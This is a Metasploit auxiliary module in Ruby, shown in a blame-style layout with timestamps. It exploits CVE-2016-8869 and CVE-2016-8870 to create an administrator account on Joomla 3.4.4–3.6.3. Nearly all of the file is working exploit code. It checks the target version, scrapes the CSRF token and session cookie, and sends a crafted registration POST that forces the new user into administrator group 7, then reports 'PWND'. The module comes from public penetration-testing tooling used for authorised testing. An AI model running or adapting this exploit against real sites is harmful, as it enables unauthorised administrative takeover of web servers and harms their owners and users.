2016-10-27 01:46:40 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2016-10-27 01:46:40 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2016-10-27 13:30:59 +00:00
|
|
|
include Msf::Exploit::Remote::HTTP::Joomla
|
2016-10-27 01:46:40 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Joomla Account Creation and Privilege Escalation',
|
|
|
|
'Description' => %q{
|
2016-11-02 03:42:06 +00:00
|
|
|
This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4
|
2016-10-27 01:46:40 +00:00
|
|
|
through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2016-8869'],
|
|
|
|
['CVE', '2016-8870'],
|
|
|
|
['URL', 'https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html'],
|
|
|
|
['URL', 'https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html'],
|
|
|
|
['URL', 'https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2']
|
|
|
|
],
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Fabio Pires <fp[at]integrity.pt>', # module creation and privilege escalation
|
|
|
|
'Filipe Reis <fr[at]integrity.pt>', # module creation and privilege escalation
|
|
|
|
'Vitor Oliveira <vo[at]integrity.pt>', # module creation and privilege escalation
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'DisclosureDate' => 'Oct 25 2016'
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/']),
|
|
|
|
OptString.new('USERNAME', [true, 'Username that will be created', 'expl0it3r']),
|
|
|
|
OptString.new('PASSWORD', [true, 'Password for the username', 'expl0it3r']),
|
2016-11-02 03:42:06 +00:00
|
|
|
OptString.new('EMAIL', [true, 'Email to receive the activation code for the account', 'example@youremail.com'])
|
2016-10-27 13:30:59 +00:00
|
|
|
]
|
|
|
|
)
|
2016-10-28 10:24:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
2016-11-02 03:42:06 +00:00
|
|
|
res = send_request_cgi('uri' => target_uri.path)
|
2016-10-28 10:24:39 +00:00
|
|
|
|
|
|
|
unless res
|
|
|
|
print_error("Connection timed out")
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
end
|
|
|
|
|
|
|
|
online = joomla_and_online?
|
|
|
|
unless online
|
|
|
|
print_error("Unable to detect joomla on #{target_uri.path}")
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
version = Gem::Version.new(joomla_version)
|
2016-11-02 03:42:06 +00:00
|
|
|
if version
|
2016-10-28 10:24:39 +00:00
|
|
|
print_status("Detected Joomla version #{joomla_version}")
|
2016-11-02 03:42:06 +00:00
|
|
|
return Exploit::CheckCode::Appears if version.between?(Gem::Version.new('3.4.4'), Gem::Version.new('3.6.3'))
|
2016-10-28 10:24:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Detected if online
|
2016-10-27 01:46:40 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def get_csrf(hidden_fields)
|
|
|
|
hidden_list = hidden_fields
|
|
|
|
hidden_list.each do |fields|
|
|
|
|
fields.each do |item|
|
2016-10-27 13:30:59 +00:00
|
|
|
if item[0].length == 32 && item[1] == '1'
|
2016-10-27 01:46:40 +00:00
|
|
|
return item[0]
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2016-11-02 03:42:06 +00:00
|
|
|
if check == Exploit::CheckCode::Safe
|
|
|
|
print_error('Target seems safe, so we will not continue!')
|
|
|
|
return
|
2016-10-28 10:24:39 +00:00
|
|
|
end
|
|
|
|
|
2016-10-27 01:46:40 +00:00
|
|
|
print_status("Trying to create the user!")
|
|
|
|
res = send_request_cgi(
|
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php/component/users/'),
|
|
|
|
'vars_get' => {
|
|
|
|
'view' => 'login'
|
|
|
|
}
|
|
|
|
)
|
|
|
|
|
2016-10-28 10:24:39 +00:00
|
|
|
if res && res.code == 200
|
|
|
|
cookie = res.get_cookies
|
|
|
|
csrf = get_csrf(res.get_hidden_inputs)
|
|
|
|
|
|
|
|
if csrf.length != 32 && cookie.split(/=/).length != 2
|
|
|
|
print_error('Could not find csrf or cookie!')
|
|
|
|
return
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error('Could not find Login Page!')
|
|
|
|
return
|
|
|
|
end
|
2016-10-27 01:46:40 +00:00
|
|
|
|
|
|
|
mime = Rex::MIME::Message.new
|
|
|
|
mime.add_part(datastore['USERNAME'], nil, nil, 'form-data; name="user[name]"')
|
|
|
|
mime.add_part(datastore['USERNAME'], nil, nil, 'form-data; name="user[username]"')
|
2016-10-27 01:50:20 +00:00
|
|
|
mime.add_part('7', nil, nil, 'form-data; name="user[groups][]"')
|
|
|
|
mime.add_part(datastore['PASSWORD'], nil, nil, 'form-data; name="user[password1]"')
|
|
|
|
mime.add_part(datastore['PASSWORD'] , nil, nil, 'form-data; name="user[password2]"')
|
2016-10-27 01:46:40 +00:00
|
|
|
mime.add_part(datastore['EMAIL'], nil, nil, 'form-data; name="user[email1]"')
|
|
|
|
mime.add_part(datastore['EMAIL'], nil, nil, 'form-data; name="user[email2]"')
|
|
|
|
mime.add_part('com_users', nil, nil, 'form-data; name="option"')
|
|
|
|
mime.add_part('user.register', nil, nil, 'form-data; name="task"')
|
|
|
|
mime.add_part('1', nil, nil, 'form-data; name="' + csrf +'"')
|
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php/component/users/'),
|
|
|
|
'cookie' => cookie,
|
|
|
|
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
|
|
|
|
'data' => mime.to_s
|
|
|
|
)
|
2016-10-27 01:50:20 +00:00
|
|
|
|
2016-10-27 01:46:40 +00:00
|
|
|
if res && res.code == 200
|
|
|
|
print_good("PWND - Your user has been created")
|
|
|
|
print_status("\tUsername: " + datastore['USERNAME'])
|
|
|
|
print_status("\tPassword: " + datastore['PASSWORD'])
|
2016-11-02 03:42:06 +00:00
|
|
|
print_status("\tEmail: " + datastore['EMAIL'])
|
|
|
|
elsif res.redirect?
|
|
|
|
res = send_request_cgi!(
|
|
|
|
'uri' => res.redirection.path,
|
|
|
|
'method' => 'GET',
|
|
|
|
'cookie' => cookie
|
|
|
|
)
|
2016-10-27 01:46:40 +00:00
|
|
|
|
2016-10-27 13:30:59 +00:00
|
|
|
print_error("There was an issue, but the user could have been created.")
|
2016-10-27 01:50:20 +00:00
|
|
|
|
2016-10-27 13:30:59 +00:00
|
|
|
parsed_data = res.get_html_document
|
|
|
|
parsed_data.xpath('//div[@class="alert-message"]').each do |alert_msg|
|
|
|
|
print_error("\t" + alert_msg.text)
|
|
|
|
end
|
2016-10-27 01:46:40 +00:00
|
|
|
else
|
|
|
|
print_error("This host may not be vulnerable.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|